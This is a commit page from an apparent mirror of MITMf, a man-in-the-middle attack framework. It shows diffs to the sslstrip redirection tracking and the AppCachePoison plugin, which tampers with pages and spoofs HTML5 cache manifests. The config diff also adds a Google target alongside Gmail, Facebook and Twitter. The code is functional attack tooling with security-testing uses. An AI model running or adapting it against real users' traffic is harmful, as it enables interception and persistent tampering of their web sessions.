github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-16 10:03:52 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

-Fixed bug in App Cache Poison plugin, missing function call resulted in some websites not loading

Browse source 
-Added output to the AppCachePoison plugin
This commit is contained in:
byt3bl33d3r 2015-03-15 16:42:17 +01:00
parent aa2fa90642
commit 0c57f39671
5 changed files with 22 additions and 9 deletions
Download patch file Download diff file Expand all files Collapse all files

2
README.md
View file

@ -5,7 +5,7 @@ Framework for Man-In-The-Middle attacks
Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it
This tool is completely based on sergio-proxy https://github.com/supernothing/sergio-proxy and is an attempt to revive and update the project. This tool is based on sergio-proxy https://github.com/supernothing/sergio-proxy and is an attempt to revive and update the project.
**Before submitting issues please read the appropriate section.** **Before submitting issues please read the appropriate section.**

6
config/mitmf.cfg
View file

@ -163,6 +163,10 @@
manifest_url=http://mail.google.com/robots.txt manifest_url=http://mail.google.com/robots.txt
templates=default # could be omitted templates=default # could be omitted
[[google]]
tamper_url = http://www.google.com/
manifest_url = http://www.google.com/robots.txt
[[facebook]] [[facebook]]
tamper_url=http://www.facebook.com/ tamper_url=http://www.facebook.com/
manifest_url=http://www.facebook.com/robots.txt manifest_url=http://www.facebook.com/robots.txt
@ -173,7 +177,7 @@
#tamper_url_match=^http://(www\.)?twitter\.com/$ #tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt manifest_url=http://twitter.com/robots.txt
[[testing]] [[html5rocks]]
tamper_url=http://www.html5rocks.com/en/ tamper_url=http://www.html5rocks.com/en/
manifest_url=http://www.html5rocks.com/robots.txt manifest_url=http://www.html5rocks.com/robots.txt

1
libs/sslstrip/ServerConnection.py
View file

@ -113,6 +113,7 @@ class ServerConnection(HTTPClient):
if (key.lower() == 'location'): if (key.lower() == 'location'):
value = self.replaceSecureLinks(value) value = self.replaceSecureLinks(value)
self.urlMonitor.addRedirection(self.client.uri, value)
if (key.lower() == 'content-type'): if (key.lower() == 'content-type'):
if (value.find('image') != -1): if (value.find('image') != -1):

4
libs/sslstrip/URLMonitor.py
View file

@ -63,7 +63,9 @@ class URLMonitor:
if from_url in s: if from_url in s:
s.add(to_url) s.add(to_url)
return return
self.redirects.append(set([from_url,to_url])) url_set = set([from_url, to_url])
logging.debug("[URLMonitor] Set redirection: %s" % url_set)
self.redirects.append(url_set)
def getRedirectionSet(self, url): def getRedirectionSet(self, url):
for s in self.redirects: for s in self.redirects:

18
plugins/AppCachePoison.py
View file

@ -38,20 +38,22 @@ class AppCachePlugin(Plugin):
if "enable_only_in_useragents" in self.config: if "enable_only_in_useragents" in self.config:
regexp = self.config["enable_only_in_useragents"] regexp = self.config["enable_only_in_useragents"]
if regexp and not re.search(regexp,req_headers["user-agent"]): if regexp and not re.search(regexp,req_headers["user-agent"]):
logging.debug("Tampering disabled in this useragent (%s)" % (req_headers["user-agent"])) logging.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
return {'request': request, 'data': data} return {'request': request, 'data': data}
urls = self.urlMonitor.getRedirectionSet(url) urls = self.urlMonitor.getRedirectionSet(url)
logging.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
(name,s,element,url) = self.getSectionForUrls(urls) (name,s,element,url) = self.getSectionForUrls(urls)
if s is False: if s is False:
data = self.tryMassPoison(url, data, headers, req_headers, ip) data = self.tryMassPoison(url, data, headers, req_headers, ip)
return {'request': request, 'data': data} return {'request': request, 'data': data}
logging.debug("Found URL %s in section %s" % (url, name)) logging.info("%s Found URL %s in section %s" % (ip, url, name))
p = self.getTemplatePrefix(s) p = self.getTemplatePrefix(s)
if element == 'tamper': if element == 'tamper':
logging.debug("Poisoning tamper URL with template %s" % (p)) logging.info("%s Poisoning tamper URL with template %s" % (ip, p))
if os.path.exists(p + '.replace'): # replace whole content if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r') f = open(p + '.replace','r')
data = self.decorate(f.read(), s) data = self.decorate(f.read(), s)
@ -68,12 +70,12 @@ class AppCachePlugin(Plugin):
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data) data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
elif element == "manifest": elif element == "manifest":
logging.debug("Poisoning manifest URL") logging.info("%s Poisoning manifest URL" % ip)
data = self.getSpoofedManifest(url, s) data = self.getSpoofedManifest(url, s)
headers.setRawHeaders("Content-Type", ["text/cache-manifest"]) headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
elif element == "raw": # raw resource to modify, it does not have to be html elif element == "raw": # raw resource to modify, it does not have to be html
logging.debug("Poisoning raw URL") logging.info("%s Poisoning raw URL" % ip)
if os.path.exists(p + '.replace'): # replace whole content if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r') f = open(p + '.replace','r')
data = self.decorate(f.read(), s) data = self.decorate(f.read(), s)
@ -164,12 +166,16 @@ class AppCachePlugin(Plugin):
if isinstance(self.config[i], dict): #section if isinstance(self.config[i], dict): #section
section = self.config[i] section = self.config[i]
name = i name = i
if section.get('tamper_url',False) == url: if section.get('tamper_url',False) == url:
return (name, section, 'tamper',url) return (name, section, 'tamper',url)
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url): if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
return (name, section, 'tamper',url) return (name, section, 'tamper',url)
if section.get('manifest_url',False) == url: if section.get('manifest_url',False) == url:
return (name, section, 'manifest',url) return (name, section, 'manifest',url)
if section.get('raw_url',False) == url: if section.get('raw_url',False) == url:
return (name, section, 'raw',url) return (name, section, 'raw',url)